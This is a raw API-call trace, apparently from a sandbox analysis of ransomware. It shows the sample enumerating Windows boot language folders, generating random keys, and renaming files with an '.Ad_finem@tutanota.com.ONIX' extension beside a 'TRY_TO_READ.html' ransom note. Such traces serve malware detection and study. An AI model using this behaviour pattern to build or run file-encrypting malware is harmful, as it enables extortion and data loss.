GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0065.476] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0065.476] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Boot\\sv-SE9c354ca09c354b444c.lock") returned 37 [0065.476] CreateFileW (lpFileName="C:\\\\Boot\\sv-SE9c354ca09c354b444c.lock" (normalized: "c:\\boot\\sv-se9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0065.476] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.476] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.476] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.476] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.476] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d0a8 | out: hHeap=0x410000) returned 1 [0065.476] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d0d0 | out: hHeap=0x410000) returned 1 [0065.476] FindFirstFileW (in: lpFileName="C:\\\\Boot\\sv-SE\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x309bac30, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309bac30, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48e630 [0065.477] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.477] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.477] GetLastError () returned 0x0 [0065.477] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.477] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.477] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.477] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47d0a8 [0065.477] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e670 [0065.477] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e670 | out: hHeap=0x410000) returned 1 [0065.477] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.477] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.477] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d0a8 | out: hHeap=0x410000) returned 1 [0065.477] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.477] FindNextFileW (in: hFindFile=0x48e630, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x309bac30, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309bac30, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.477] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.477] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.477] GetLastError () returned 0x0 [0065.477] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.477] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.477] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.477] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47d0a8 [0065.477] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e670 [0065.477] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e670 | out: hHeap=0x410000) returned 1 [0065.477] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.477] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.477] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d0a8 | out: hHeap=0x410000) returned 1 [0065.477] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.477] FindNextFileW (in: hFindFile=0x48e630, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.477] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.477] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.477] GetLastError () returned 0x0 [0065.477] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47d0a8 [0065.477] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.478] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.478] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.478] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.478] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d0a8 | out: hHeap=0x410000) returned 1 [0065.478] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.478] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x48d5c0 [0065.478] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466738 [0065.478] CreateFileW (lpFileName="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.478] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.478] CreateFileW (lpFileName="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.478] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.478] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48d5c0 | out: pbBuffer=0x48d5c0) returned 1 [0065.478] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x466738 | out: pbBuffer=0x466738) returned 1 [0065.478] SetFileAttributesW (lpFileName="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0065.478] lstrlenW (lpString="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui") returned 30 [0065.478] GetProcessHeap () returned 0x410000 [0065.478] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xac) returned 0x473108 [0065.478] lstrcpyW (in: lpString1=0x473108, lpString2="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui") returned="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui" [0065.479] lstrcatW (in: lpString1="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0065.479] GetProcessHeap () returned 0x410000 [0065.479] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.479] CloseHandle (hObject=0xffffffff) returned 0 [0065.479] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.479] FindNextFileW (in: hFindFile=0x48e630, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x309bac30, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x309bac30, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309bac30, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0065.479] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.479] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.479] GetLastError () returned 0x6 [0065.479] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.479] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c60 [0065.479] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.479] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.479] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c60 | out: hHeap=0x410000) returned 1 [0065.479] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.479] FindNextFileW (in: hFindFile=0x48e630, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x309bac30, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x309bac30, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309bac30, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0065.479] CloseHandle (hObject=0x3cc) returned 1 [0065.479] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.479] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x5, wMilliseconds=0x7f)) [0065.479] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0065.479] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0065.480] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0065.480] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Boot\\tr-TR9c354ca09c354b444c.lock") returned 37 [0065.480] CreateFileW (lpFileName="C:\\\\Boot\\tr-TR9c354ca09c354b444c.lock" (normalized: "c:\\boot\\tr-tr9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0065.480] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.480] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.480] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.480] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.480] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d0f8 | out: hHeap=0x410000) returned 1 [0065.480] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d120 | out: hHeap=0x410000) returned 1 [0065.480] FindFirstFileW (in: lpFileName="C:\\\\Boot\\tr-TR\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x309bac30, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309bac30, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48e670 [0065.481] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.481] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.481] GetLastError () returned 0x0 [0065.481] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.481] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.481] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.481] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47d0f8 [0065.481] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e6b0 [0065.481] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e6b0 | out: hHeap=0x410000) returned 1 [0065.481] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.481] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.481] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d0f8 | out: hHeap=0x410000) returned 1 [0065.481] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.481] FindNextFileW (in: hFindFile=0x48e670, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x309bac30, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309bac30, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.481] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.481] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.481] GetLastError () returned 0x0 [0065.481] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.481] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.481] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.481] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47d0f8 [0065.481] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e6b0 [0065.481] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e6b0 | out: hHeap=0x410000) returned 1 [0065.481] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.481] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.481] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d0f8 | out: hHeap=0x410000) returned 1 [0065.481] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.481] FindNextFileW (in: hFindFile=0x48e670, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.481] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.481] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.481] GetLastError () returned 0x0 [0065.482] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47d0f8 [0065.482] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.482] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.482] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.482] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.482] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d0f8 | out: hHeap=0x410000) returned 1 [0065.482] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.482] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x48d6c8 [0065.482] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466748 [0065.482] CreateFileW (lpFileName="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.482] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.482] CreateFileW (lpFileName="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.482] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.482] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48d6c8 | out: pbBuffer=0x48d6c8) returned 1 [0065.482] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x466748 | out: pbBuffer=0x466748) returned 1 [0065.482] SetFileAttributesW (lpFileName="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0065.482] lstrlenW (lpString="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui") returned 30 [0065.482] GetProcessHeap () returned 0x410000 [0065.482] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xac) returned 0x473108 [0065.483] lstrcpyW (in: lpString1=0x473108, lpString2="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui") returned="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui" [0065.483] lstrcatW (in: lpString1="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0065.483] GetProcessHeap () returned 0x410000 [0065.483] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.483] CloseHandle (hObject=0xffffffff) returned 0 [0065.483] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.483] FindNextFileW (in: hFindFile=0x48e670, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x309bac30, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x309bac30, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309bac30, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0065.483] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.483] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.483] GetLastError () returned 0x6 [0065.483] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.483] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c60 [0065.483] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.483] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.483] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c60 | out: hHeap=0x410000) returned 1 [0065.483] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.483] FindNextFileW (in: hFindFile=0x48e670, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x309bac30, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x309bac30, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309bac30, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0065.483] CloseHandle (hObject=0x3cc) returned 1 [0065.483] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.483] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x5, wMilliseconds=0x7f)) [0065.483] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0065.484] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0065.484] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0065.484] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Boot\\zh-CN9c354ca09c354b444c.lock") returned 37 [0065.484] CreateFileW (lpFileName="C:\\\\Boot\\zh-CN9c354ca09c354b444c.lock" (normalized: "c:\\boot\\zh-cn9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0065.484] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.484] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.484] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.484] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.484] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f4a0 | out: hHeap=0x410000) returned 1 [0065.484] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f4c8 | out: hHeap=0x410000) returned 1 [0065.484] FindFirstFileW (in: lpFileName="C:\\\\Boot\\zh-CN\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x309bac30, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309bac30, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48e6b0 [0065.485] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.485] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.485] GetLastError () returned 0x0 [0065.485] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 